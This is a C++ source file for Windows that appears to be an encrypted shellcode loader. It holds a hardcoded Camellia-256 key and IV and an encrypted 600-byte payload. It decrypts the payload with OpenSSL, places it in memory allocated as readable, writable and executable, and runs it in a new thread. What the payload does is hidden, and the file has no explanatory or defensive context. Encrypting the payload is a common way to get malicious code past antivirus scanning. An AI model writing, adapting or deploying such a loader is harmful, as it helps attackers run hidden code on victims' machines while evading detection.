#include <iostream>
#include <windows.h>

#include <openssl/camellia.h>
#include <openssl/comp.h>
#include <openssl/err.h>

#pragma warning(disable:4996)

CAMELLIA_KEY finalkey;


int main() {
    
    unsigned char plaintext[607] = "";

    void* exec;
    HANDLE hThread;

    int padding = 2;
    const unsigned char key[] = "\xe3\x12\xcd\x3b\x03\xea\x27\x30\x94\xb9\x1c\xaa\x05\x35\xde\x68\x33\x59\xe1\x7c\x4f\x6d\x17\x94\x1a\xfd\xc5\x3c\x64\xd4\xe8\x64";
    unsigned char iv[] = "\x6b\x05\xf8\x7b\xb2\x42\xaa\xe4\xbc\xfd\xf5\xbd\xac\x4f\x76\x24";

    unsigned char frozone[] =
        "\x03\x26\x98\xf5\x8c\xfa\xb3\xf9\xc1\xd1\x3e\x00\x8f\x8c\x27"
        "\x06\xb4\xaa\x25\x8d\xfa\x89\xb8\x04\x39\x41\x80\xff\x08\x9b"
        "\xae\x0f\x0e\x88\x41\x03\x79\x3d\xc7\x9c\x0b\x31\x03\x96\xbe"
        "\x6d\x67\x73\xa5\x50\x37\xff\xc8\x83\x49\x75\x9d\x58\x5b\x5c"
        "\xe6\xd5\x2c\x6d\xb6\x66\x04\xdd\x24\x32\x7c\x42\x2d\xcd\x16"
        "\x64\x48\xa7\xf1\x52\x49\x6f\x73\x82\xaa\x09\xe7\x42\x3e\x2d"
        "\x11\x37\x26\xee\x9f\x59\x94\x6a\x06\x7c\x77\x09\x3b\x87\xde"
        "\x71\xa7\x4e\x03\xfa\x6b\xe8\xef\x03\x2d\x87\x15\xf6\x4a\x94"
        "\xf6\x9d\xfe\x7a\x3c\x10\x95\x24\x6b\xbe\x8a\x55\xdc\xb7\x19"
        "\x7c\x21\x96\xeb\x54\x84\x9b\x19\xa3\xab\xdd\xd9\x48\xec\xd1"
        "\x12\x1b\x60\x64\x0e\xb5\xa7\xaa\xa2\x18\x33\x94\x0e\x92\x24"
        "\x43\x1e\x13\x73\x6d\x88\x9f\xf3\xc3\x09\x46\x2f\xd9\x0f\x07"
        "\x63\x39\xa8\xf8\xca\xbf\xf2\xf1\x67\xfd\x3b\x85\xe7\x7d\xc5"
        "\x76\xf7\xd8\x30\x7b\x86\xa4\x36\xb6\xcd\xf0\xf6\x6b\x8b\xa9"
        "\xa1\x33\x5a\x98\xac\x70\xa2\x81\x80\xfa\xaa\xb0\x6f\xd4\xd5"
        "\x44\x17\x37\x72\xe6\x29\x57\x3e\x5d\x23\x48\xbf\xc0\x81\x9f"
        "\x99\xba\xc0\x2a\x90\x7c\x62\x01\xc5\x6c\xa1\x0b\x74\x28\xd2"
        "\xd8\x1e\x6d\xf1\x9b\xda\xd1\xdb\x56\x79\x4e\xd2\x16\x8e\xd5"
        "\x48\x83\x3a\x5a\x97\x8f\x96\x24\x0c\x5c\xcd\x0b\x66\xc5\xb7"
        "\x04\xcd\x12\x6d\xdf\xf8\xf8\xec\x10\xf7\x54\x30\xe2\x26\x71"
        "\x75\x45\xd1\x2f\x4e\x05\xbe\x30\x5a\x98\x6b\xef\xb1\xaa\xab"
        "\x30\xd8\x3f\xeb\x4e\x9f\xb2\x25\xfb\x54\x44\x09\x7c\x94\xbe"
        "\xbb\xfc\x49\x21\x3a\x1d\x3f\x44\x88\xd8\x91\x99\x6f\x83\x24"
        "\xd4\xa1\xda\x60\xb6\x34\x97\x1b\x84\xc9\x46\x1d\xc9\x6e\x1e"
        "\xdb\x66\xcd\x68\xeb\xe6\xcd\x62\xc3\xa5\xd2\xde\xb3\x4b\x45"
        "\xb4\x8e\x47\x9c\x9f\x2e\x5e\xa3\x9e\x06\x4c\x8c\xac\x6b\x56"
        "\x99\xc0\x82\x7c\x56\x68\xe7\x44\x64\xbf\x77\xbd\x13\x8c\xfe"
        "\xd4\x82\xf4\x94\x92\xeb\x47\xb1\x1f\xfe\x02\x53\x43\x83\x25"
        "\xcc\xbe\xe4\xa6\x9c\xb9\x09\xef\x32\xc6\xff\xd5\x52\xb6\x57"
        "\x9b\x41\x4b\xaa\xa8\x1e\x64\x81\xdf\x59\xd6\x6c\xe3\x51\x08"
        "\x95\x7d\x5c\xfa\xe8\xd9\x6e\x49\x60\x08\x26\xbc\x32\xbd\x13"
        "\xad\x0d\x4d\x8d\x90\x35\xf0\x64\xaa\x30\xb0\x02\x8a\x6b\xfd"
        "\xe2\x41\x25\x05\x28\x5e\xb1\xce\xd3\x0c\x73\xfd\x6b\xee\x11"
        "\xdb\x68\xfc\x78\x83\xac\x40\x6f\x5c\xdf\xca\x04\xb6\xcd\xe8"
        "\x66\xf1\x7a\x77\x32\x4b\x21\x8d\x00\x4e\x1c\xc6\xc0\xf2\x1f"
        "\xd3\x6f\xe9\x3d\xee\xea\xde\x8f\x90\x49\x31\x8c\x68\x61\xe2"
        "\x44\x60\xdf\x01\x8b\x38\xa0\xfd\x6e\x00\xfe\x10\xe2\x34\xdb"
        "\xa6\x84\xea\xc2\xb2\x3c\x55\x97\x90\x96\xeb\x98\x87\xd6\x65"
        "\x32\xcb\x5d\xc8\x45\x30\x60\xb2\xe8\x14\x6f\xf0\x1a\x5a\xd0"
        "\xe5\x9e\x7e\x25\x82\x5b\xed\x58\x53\xa3\x6d\x34\xf3\x52\x09"
        "\x3f\x57\x36\x8f\x13\xda\x6f\x6d";


    Camellia_set_key(key, 256, &finalkey);
    int keylen = sizeof(frozone) - padding;
    Camellia_cbc_encrypt(frozone, plaintext, keylen, &finalkey, iv, 0);

    exec = VirtualAlloc(0, keylen, MEM_COMMIT | MEM_RESERVE, 0x40);

    RtlMoveMemory(exec, plaintext, keylen);

    hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);

    WaitForSingleObject(hThread, -1);
}

